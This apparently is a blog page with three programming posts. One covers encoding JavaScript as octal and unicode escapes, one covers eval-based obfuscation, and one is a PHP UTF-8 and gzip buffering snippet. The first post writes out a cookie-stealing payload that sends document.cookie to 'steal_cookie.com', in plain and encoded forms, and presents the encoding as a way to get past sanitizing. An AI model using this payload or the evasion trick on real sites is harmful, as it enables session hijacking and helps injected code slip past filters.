JavaScript Character Encoding As Spoofing, Or Malicious Injections That Are 100% executable, But Totally Unreadable

function string_to_octal(string){
  return string.replace(/./g, function(char, index, whole){
    return 256 > char.charCodeAt(0) ? "\\" + ('0' + char.charCodeAt(0).toString(8)).slice(-3) : unicode_to_string(char);
  });
}
function string_to_unicode(string){
  return string.replace(/./g, function(char, index, whole){
    return "\\u" + ('0000' + char.charCodeAt(0).toString(16)).slice(-4);
  });
}
function unicode_to_string(string){
  return string.replace(/[\u0000-\uffff]/g, function(char, index, whole){
    return String.fromCharCode(char.charCodeAt(0).toString(10));
  });
}

test it..
for javascript:(function(){var img = new Image(); img.src="https://steal_cookie.com?cookie=" + encodeURIComponent(document.cookie); return true;}());

either the “prefer octal over unicode”: "\152\141\166\141\163\143\162\151\160\164\072\050\146\165\156\143\164\151\157\156\050\051\173\166\141\162\040\151\155\147\040\075\040\156\145\167\040\111\155\141\147\145\050\051\073\040\151\155\147\056\163\162\143\075\042\150\164\164\160\163\072\057\057\163\164\145\141\154\137\143\157\157\153\151\145\056\143\157\155\077\143\157\157\153\151\145\075\042\040\053\040\145\156\143\157\144\145\125\122\111\103\157\155\160\157\156\145\156\164\050\144\157\143\165\155\145\156\164\056\143\157\157\153\151\145\051\073\040\162\145\164\165\162\156\040\164\162\165\145\073\175\050\051\051\073" (which most of ASCII based code will work quite unify with..)
or just “100% unicode encoding”: "\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u0076\u0061\u0072\u0020\u0069\u006d\u0067\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0049\u006d\u0061\u0067\u0065\u0028\u0029\u003b\u0020\u0069\u006d\u0067\u002e\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0073\u0074\u0065\u0061\u006c\u005f\u0063\u006f\u006f\u006b\u0069\u0065\u002e\u0063\u006f\u006d\u003f\u0063\u006f\u006f\u006b\u0069\u0065\u003d\u0022\u0020\u002b\u0020\u0065\u006e\u0063\u006f\u0064\u0065\u0055\u0052\u0049\u0043\u006f\u006d\u0070\u006f\u006e\u0065\u006e\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003b\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0072\u0075\u0065\u003b\u007d\u0028\u0029\u0029\u003b"

running the following will have same meaning, and it will not actual needed to be translated back, it is totally 100% executable code, but (naturally) a bit more hard to read..
but it DOES sanitize successfully since the character encoding does not differentiate any of the char meaning (other then escaped string – string manipulation).

the idea is that you do not need any conversion-matrix tables, or encrypt/decrypt methods (or any intermediate over just evaluating the string).

JavaScript Ninja Techniques – JavaScript Based Obfuscation 101 Using Conversion Matrix Unify With A Prime Number

JavScript code obfuscation:
– is used for: “reasons”…
– provides some low-level protecting against: straight-forward debugging, hardening listening or program-flow.
– required to: execute fast, limit ‘eval’ execution, DOM friendly

in plain terms, JavaScript code obfuscation is a translatable matrix-conversion, that stills allows the D.O.M to “understand” the code, but makes debugging/watching too exhausting for a human.

best practices also covers minimal D.O.M evaluations: since obfuscated code usually executes few other methods for the same plain input, a good obfuscation algorithm adds fewest evaluated phrases as possible, and called ‘eval’ method only once.

here is a simple example, that uses JavaScript to obfuscated a plain JavaScript code (can be anything really…)

function fromE(n){
  var chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890';
  var char;

  if(0 === n % 311) //311 is is a prime-number, it is not normally a multiplication of any ASCII char (maybe long UNICODE.. TODO: choose larger primer)
    char = String.fromCharCode(n / 311);
  else
    char = chars.substr(n,1);

  return char;
}

var phrase = 'console.log("hello")';
var obfuscated_phrase = "[" + phrase.replace(/./g,toE).replace(/\,$/,'') + "]";
var translated_plain_phrase = eval(obfuscated_phrase).join('');


console.log("From: \n" + phrase + "\n\n" + "To: \n" + obfuscated_phrase + "\n\n" + "Back To: \n" + translated_plain_phrase + "\n");

it result with the following output in the Console:

From: 
console.log("hello")

To: 
[fromE(2),fromE(14),fromE(13),fromE(18),fromE(14),fromE(11),fromE(4),fromE(14306),fromE(11),fromE(14),fromE(6),fromE(12440),fromE(10574),fromE(7),fromE(4),fromE(11),fromE(11),fromE(14),fromE(10574),fromE(12751)]

Back To: 
console.log("hello")


piping the result from this simple obfuscation matrix into Closure Compiler Service or UglifyJS may be interesting to witness, normally both c.compiler and uglifyJS try to “understand” the code by braking it to trees, then parse it using tree-logic permitted-operations resulting smaller trees, then re-parse the trees back to plain code,
so… it will either increase or decrease the complexity of the code using more or fewer transitions, rule-of-thumb is that you should obfuscate your code using three or more chained calls, this will result with a very deep and narrow tree, and UglifyJS or Google Closure-Compiler, will then “work for you” minifying and obfuscating the end-result even more, with minimal, or no-human intervention..


PHP Snippet – Proper UTF-8 And GZip With Buffers-Handling And Content-Length Header And Ratio Information

  1. first, set up internal engine to UTF-8.

    mb_language("uni");
    mb_internal_encoding("UTF-8");
    mb_http_input("UTF-8");
    mb_http_output("UTF-8");
    mb_regex_encoding("UTF-8");
    setlocale(LC_ALL, "he_IL.UTF-8");
    
    1. start the GZIP buffer
    2. start the internal-engine-buffer (now set for UTF-8).
    3. notice that the implicit flush is set twice, keep it.
    ob_start("ob_gzhandler");
    ob_implicit_flush(false);
    
    ob_start("mb_output_handler");
    ob_implicit_flush(false);
    
  2. use your PHP script as usual,
    echo content, print, print_r, var_dump, etc..

    for example:

    echo str_repeat("-=á黪ğřƳȪȭDZȌȢɸʌΈΣϣொᆕᶙṕℳℱⅧ⅜⇦∬⓲┲▶➂ⶴは㌵㠩דוזחטש", 3000);
    
  3. script end:
    we will close the buffers and flush them, in a backward-order
    ,

    this will enable us to collect data on the each of the output’s-length too!
    (I found it so interesting I will actually write some extra headers with the information..)

    1. (optionally)store size-of the raw output.
    2. close and flush the raw output.
    3. (optionally)store size-of the mb (UTF-8) buffered output.
    4. close and flush the mb_outputhandler (UTF-8) buffered output.
    5. (optionally)store size-of the mb (UTF-8) buffered output.
    6. close and flush the ob_gzhandler (GZIP) buffered output.
    $content_length__raw = ob_get_length();
    ob_end_flush(); //close the raw output which will be dumped into the internal engine buffer.
    
    $content_length__utf8 = ob_get_length();
    ob_end_flush(); //close the internal-engine buffer, which will be dumped into the gzip engine buffer.
    
    $content_length__gzip = ob_get_length();
    
  4. at this point the value of content_length__gzip is actually the Content-Length header value since its the real output length (the final layer).

  5. write the Content-Length header.

    header('Content-Length: ' . $content_length__gzip);
    
  6. any additional headers should be written now.
    for example:

    header('Content-Type: text/html; charset=utf-8');
    

  • the easiest way is to wrap it all in few functions..
    here is a complete example, that will write an additional interesting information as headers (why headers? well, naturally, altering with the body of the response will change the measurements.. so headers is the best way..)
  • the result will look like so:

    2014-08-02_181624

    2014-08-02_181757